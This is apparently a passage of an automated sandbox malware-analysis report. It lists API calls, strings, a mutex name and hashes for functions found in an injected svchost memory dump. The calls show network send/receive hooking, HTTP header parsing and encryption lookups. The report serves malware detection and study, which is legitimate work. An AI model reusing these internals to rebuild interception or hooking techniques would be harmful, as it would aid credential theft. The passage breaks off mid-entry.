                                                                                                                                                                                                            • ReadFile.KERNEL32 ref: 02C8F12C
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02C8F142
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02C8F14E
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75497390), ref: 02C8F172
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F185
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F188
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F195
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F198
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$AllocFreePointerReadSizeValidatememset
                                                                                                                                                                                                            • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                            • API String ID: 2165369453-4158457813
                                                                                                                                                                                                            • Opcode ID: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                            • Instruction ID: 205416860f5337fade4d07def29ba387aed30ced77a7123e8de2b8e9bd581d6e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B331AD71E41355ABE721AF25DC44F6BB7ACEF84B58F008A1DF90487180DB30DA148BB2
                                                                                                                                                                                                            Function 02C882E0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7556F550,7556DF10,02C8475B), ref: 02C882F1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02C88303
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C88322
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,send), ref: 02C88330
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02C8834C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02C88368
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,recv), ref: 02C88384
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                            • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1216545827-2206184491
                                                                                                                                                                                                            • Opcode ID: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                            • Instruction ID: 9a52b65efe7a915dc87aac047ecc0af53a9f84a6923bcf0b944caf202d9e69fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3010C76BC032A30F92231751C02F6A824E5FC1ECDF968B31B906F25C4DA95E60648B8
                                                                                                                                                                                                            Function 02C902E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C9036D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da03d,KBP), ref: 02C90387
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da03d$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4173420962-1913664259
                                                                                                                                                                                                            • Opcode ID: 0b6ec4265ed3d3e734c9b0a50e668aede8a2d102d3d211f6fd836f1ef9661c99
                                                                                                                                                                                                            • Instruction ID: 2da9133c6d81619bcd978588399cab9ea2d0523d7024d38c1b837b514c6b9bb9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b6ec4265ed3d3e734c9b0a50e668aede8a2d102d3d211f6fd836f1ef9661c99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4701F930ECDB95BBFA1267614C0EF1A369C7F44B14F204750F919671C19BF4A90086AB
                                                                                                                                                                                                            Function 02C796FF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 264synchronizationwindowthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C7976E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C79797
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7979E
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C797B2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C79821
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C7983A
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C798CB
                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 02C798E2
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79929
                                                                                                                                                                                                            • GetWindowInfo.USER32 ref: 02C799A1
                                                                                                                                                                                                              • Part of subcall function 02C79030: GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                              • Part of subcall function 02C79030: IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                              • Part of subcall function 02C79030: GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                              • Part of subcall function 02C79030: GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                              • Part of subcall function 02C79030: MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                              • Part of subcall function 02C79030: SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                            • String ID: <$P0Wu
                                                                                                                                                                                                            • API String ID: 4123185898-3435678627
                                                                                                                                                                                                            • Opcode ID: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                            • Instruction ID: 4bcd2f6e1dc22edba24d600672e87dd96ef4d6448a9f883a8d935158106c1083
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C911531684341ABD3259F24CC89FAB7BA9AFC5714F044A2DF9668B2D1C7B4C544CBA1
                                                                                                                                                                                                            Function 02C902F8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 45sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C9036D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da03d,KBP), ref: 02C90387
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da03d$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4173420962-1913664259
                                                                                                                                                                                                            • Opcode ID: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
                                                                                                                                                                                                            • Instruction ID: 2fbf6114131304eca77c357c6b4215e969722fbf4bac548efdacd2700ee22b59
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B301D130AC9795BBFA222B304C0EF4E369CBF45B19F104750F91A661C0DBB499018AAB
                                                                                                                                                                                                            Function 02C7DA80 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7DA94
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DAF5
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DBB1
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DCF3
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DDAE
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?), ref: 02C7DDBF
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02C7DDF1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                            • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                            • API String ID: 438689982-3158524741
                                                                                                                                                                                                            • Opcode ID: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                            • Instruction ID: dd3732c7711ec3d45edace044122e002dbadd5e24b6794fc6baae500f18ee1ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85D12A76E0025A9BDF25CE68C880BEEBBB5FF85314F144169D857AB240D730DA41CBA5
                                                                                                                                                                                                            Function 02C9B080 Relevance: 21.2, APIs: 14, Instructions: 212COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3865430558-0
                                                                                                                                                                                                            • Opcode ID: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                            • Instruction ID: bf6d14dd3a9724a07df7cd090e182fe84bab0acc79f7ff47ea8ec59b600bc34a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC813EB0A00A12AFCB14CF28E888A56B7E4FF48708F184669D81ADB341D735FE55CBD5
                                                                                                                                                                                                            Function 02C7F6A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorynetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6F6
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6FD
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,80000023,?,00000018,00000000), ref: 02C7F716
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F754
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F75B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F768
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F76F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 02C7F7A5
                                                                                                                                                                                                              • Part of subcall function 02C7F210: InternetQueryOptionA.WININET(?,00000009,?,?), ref: 02C7F233
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Query$FreeValidate$HttpInfoInternetOptionmemset$Alloc
                                                                                                                                                                                                            • String ID: POST$T
                                                                                                                                                                                                            • API String ID: 4198387326-1208759463
                                                                                                                                                                                                            • Opcode ID: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                            • Instruction ID: bda962978ceaa05048a9369c1bf0b2edf011d2575adf7fbfcb0148bc20942b15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41E471A40345ABD7328FA4DCC8FA777B8AF88715F008A4DE64687980D7B0E644DBA1
                                                                                                                                                                                                            Function 02C78240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 120filesynchronizationmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,75573050,755730D0,75573080), ref: 02C78280
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78294
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7829F
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C782C7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C782E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C782F5
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C78315
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C7832C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C7836C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783BD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2125184990-465009422
                                                                                                                                                                                                            • Opcode ID: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                            • Instruction ID: 3d477f1b7a102f56b4d127cad5f1c2a6d0e46db0bc53025ec961f26a942f3015
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1441A171E80344ABD7119B74EC59F6A77A9EB88711F208F49FA11972C0CB74A920DFA0
                                                                                                                                                                                                            Function 02C7F300 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F32B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F32E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F33B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F33E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F357
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,02C7F84A,00000000,?), ref: 02C7F368
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F378
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F37B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F388
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F38B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F39B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F39E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F3AB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F3AE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2935687291-0
                                                                                                                                                                                                            • Opcode ID: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                            • Instruction ID: c67f42e586b1c9d74857217d00ebd9190e317d3f43df894b3a5983a969eb7d9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431F031E853606BDB25AF61E8C8B5B7BACFF88B25F04856AED09D7240C735C500CAE1
                                                                                                                                                                                                            Function 02C80820 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C80825
